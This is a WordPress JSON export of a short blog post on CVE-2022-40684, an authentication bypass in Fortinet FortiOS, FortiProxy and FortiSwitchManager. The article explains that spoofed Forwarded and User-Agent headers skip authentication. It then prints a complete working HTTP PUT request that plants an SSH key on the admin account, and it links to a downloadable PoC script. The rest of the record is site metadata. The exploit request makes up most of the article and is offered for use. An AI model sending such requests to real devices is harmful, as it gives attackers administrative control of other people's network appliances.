{"id":391,"date":"2022-10-15T12:32:42","date_gmt":"2022-10-15T09:32:42","guid":{"rendered":"https:\/\/trustcrypt.com\/?p=391"},"modified":"2022-10-15T13:01:31","modified_gmt":"2022-10-15T10:01:31","slug":"new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager","status":"publish","type":"post","link":"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","title":{"rendered":"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684).<br>This vulnerability could allow an attacker to log on as an administrator on an affected system.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In this article, using FortiOS version 7.2.1 as an example, we will demonstrate how attackers do it.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">PoC<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Let&#8217;s take a look at the inner workings of this vulnerability. 
The vulnerability is exploited below to add an SSH key to an administrator user, allowing an attacker to log into the affected system via SSH as an administrator. The request relies on a Forwarded header whose for= and by= parameters point at 127.0.0.1 together with the User-Agent \"Report Runner\", so the appliance treats it as a trusted internal request and skips authentication for the cmdb API.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PUT \/api\/v2\/cmdb\/system\/admin\/admin HTTP\/1.1\nHost: 192.168.10.66\nUser-Agent: Report Runner\nContent-Type: application\/json\nForwarded: for=\"&#91;127.0.0.1]:8000\";by=\"&#91;127.0.0.1]:9000\";\nContent-Length: 606\n\n{ \"ssh-public-key1\": \"\\\"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChuU209LX1lleXNEkFkyUsuvFTgNB7kPtPHuO0aZeJ6XBUASECf\/iNLpGnrEwTc\/qUiBHOUGBkunCbx7bpk8bTcQtiTSAfbL2zeA9sxiSzxUrtmW1V0if7TG4cvEJc6dli3v9cjG\/PUnbZv1ej0\/NPqPCc8qAC\/rdWQXZ2+aHy\/RTpLqQHrcJ3hJP6fST8HMSEVbA8H2SFnGZn8tX9bXmYuFuEArBvg\/Fboc8rFTTd6S3GQtaCrBqJ5uJ+D9bg7hqxZp9qqsU+751gxFsxVaE7fAH45pTD\/Wvv+U+APLq\/N7VjAqKn3pmyLun+qT+ib72Xors8DWlAqSMRmkvjg\/BdFeU\/ucRqs+FbJVKAhxiN\/qJIZmR8VfpcK4grkefrko\/eXfrM5qdHKAE1zc5+oNB9CmjyrrFzIXVTTPYl8+6q0YjifT8CP72tgghfXUZzFp3WhsiGQJSVNrOh97lnCh4nrArYUniL7ac5Q415IT8AilnDArjJ\/wFMhaTgftUo878= admin@trustcrypt.com\\\"\" }<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">You can download the PoC <a href=\"https:\/\/raw.githubusercontent.com\/horizon3ai\/CVE-2022-40684\/master\/CVE-2022-40684.py\" class=\"tlink\">here<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\" style=\"font-size:7px\">Thanks to HORIZON3.ai for the PoC<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684). This vulnerability could allow an attacker to log on as an 
administrator&#8230;<\/p>\n","protected":false},"author":1,"featured_media":393,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[28],"tags":[],"class_list":["post-391","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager - Trustcrypt<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\" \/>\n<meta property=\"og:locale\" content=\"ar_AR\" \/>\n<meta property=\"og:locale:alternate\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager\" \/>\n<meta property=\"og:description\" content=\"Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684).This vulnerability could allow an attacker to log on as an administrator...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\" \/>\n<meta property=\"og:site_name\" content=\"Trustcrypt\" \/>\n<meta property=\"article:published_time\" content=\"2022-10-15T09:32:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-10-15T10:01:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"962\" \/>\n\t<meta property=\"og:image:height\" content=\"658\" \/>\n\t<meta property=\"og:image:type\" 
content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Trustscrypt\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u0643\u064f\u062a\u0628 \u0628\u0648\u0627\u0633\u0637\u0629\" \/>\n\t<meta name=\"twitter:data1\" content=\"Trustscrypt\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0648\u0642\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u064f\u0642\u062f\u0651\u0631\" \/>\n\t<meta name=\"twitter:data2\" content=\"\u062f\u0642\u064a\u0642\u0629 \u0648\u0627\u062d\u062f\u0629\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\",\"url\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\",\"name\":\"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager\",\"isPartOf\":{\"@id\":\"https:\/\/trustcrypt.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg\",\"datePublished\":\"2022-10-15T09:32:42+00:00\",\"dateModified\":\"2022-10-15T10:01:31+00:00\",\"author\":{\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f\"},\"inLanguage\":\"ar\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ar\",\"@id\":\"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage\",\"url\":\"https:\/
\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg\",\"contentUrl\":\"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg\",\"width\":962,\"height\":658},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/trustcrypt.com\/#website\",\"url\":\"https:\/\/trustcrypt.com\/\",\"name\":\"Trustcrypt\",\"description\":\"\u0627\u0644\u0623\u0645\u0646 \u0647\u0648 \u0627\u0633\u0645\u0646\u0627 \u0627\u0644\u062b\u0627\u0646\u064a\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/trustcrypt.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"ar\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f\",\"name\":\"Trustscrypt\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ar\",\"@id\":\"https:\/\/trustcrypt.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g\",\"caption\":\"Trustscrypt\"},\"sameAs\":[\"http:\/\/trustcrypt.com\"],\"url\":\"https:\/\/trustcrypt.com\/ar\/author\/trustscrypt\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager - Trustcrypt","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","og_locale":"ar_AR","og_type":"article","og_title":"[:en]New vulnerability on FortiOS, FortiProxy, and FortiSwitchManager[:] - Trustcrypt","og_description":"Fortinet recently patched a critical authentication bypass vulnerability (CVE-2022-40684).This vulnerability could allow an attacker to log on as an administrator...","og_url":"https:\/\/trustcrypt.com\/ar\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","og_site_name":"Trustcrypt","article_published_time":"2022-10-15T09:32:42+00:00","article_modified_time":"2022-10-15T10:01:31+00:00","og_image":[{"width":962,"height":658,"url":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg","type":"image\/jpeg"}],"author":"Trustscrypt","twitter_card":"summary_large_image","twitter_misc":{"\u0643\u064f\u062a\u0628 \u0628\u0648\u0627\u0633\u0637\u0629":"Trustscrypt","\u0648\u0642\u062a \u0627\u0644\u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u064f\u0642\u062f\u0651\u0631":"\u062f\u0642\u064a\u0642\u0629 \u0648\u0627\u062d\u062f\u0629"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","url":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/","name":"New vulnerability on FortiOS, FortiProxy, and 
FortiSwitchManager","isPartOf":{"@id":"https:\/\/trustcrypt.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage"},"image":{"@id":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage"},"thumbnailUrl":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg","datePublished":"2022-10-15T09:32:42+00:00","dateModified":"2022-10-15T10:01:31+00:00","author":{"@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f"},"inLanguage":"ar","potentialAction":[{"@type":"ReadAction","target":["https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/"]}]},{"@type":"ImageObject","inLanguage":"ar","@id":"https:\/\/trustcrypt.com\/new-vulnerability-on-fortios-fortiproxy-and-fortiswitchmanager\/#primaryimage","url":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg","contentUrl":"https:\/\/trustcrypt.com\/wp-content\/uploads\/2022\/10\/FfGaHfxWIAAdccI.jpeg","width":962,"height":658},{"@type":"WebSite","@id":"https:\/\/trustcrypt.com\/#website","url":"https:\/\/trustcrypt.com\/","name":"Trustcrypt","description":"\u0627\u0644\u0623\u0645\u0646 \u0647\u0648 \u0627\u0633\u0645\u0646\u0627 
\u0627\u0644\u062b\u0627\u0646\u064a","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/trustcrypt.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ar"},{"@type":"Person","@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/469b1cf97b9f7ea4e4d7fa31689dfa9f","name":"Trustscrypt","image":{"@type":"ImageObject","inLanguage":"ar","@id":"https:\/\/trustcrypt.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4c36ff3376565a0f4981e9397667feb08d5e09acacce32a52ea4a3f628e03692?s=96&d=mm&r=g","caption":"Trustscrypt"},"sameAs":["http:\/\/trustcrypt.com"],"url":"https:\/\/trustcrypt.com\/ar\/author\/trustscrypt\/"}]}},"_links":{"self":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/comments?post=391"}],"version-history":[{"count":9,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/391\/revisions"}],"predecessor-version":[{"id":406,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/posts\/391\/revisions\/406"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/media\/393"}],"wp:attachment":[{"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/media?parent=391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/categories?post=391"},{"taxonomy":"post_tag","embeddable
":true,"href":"https:\/\/trustcrypt.com\/ar\/wp-json\/wp\/v2\/tags?post=391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}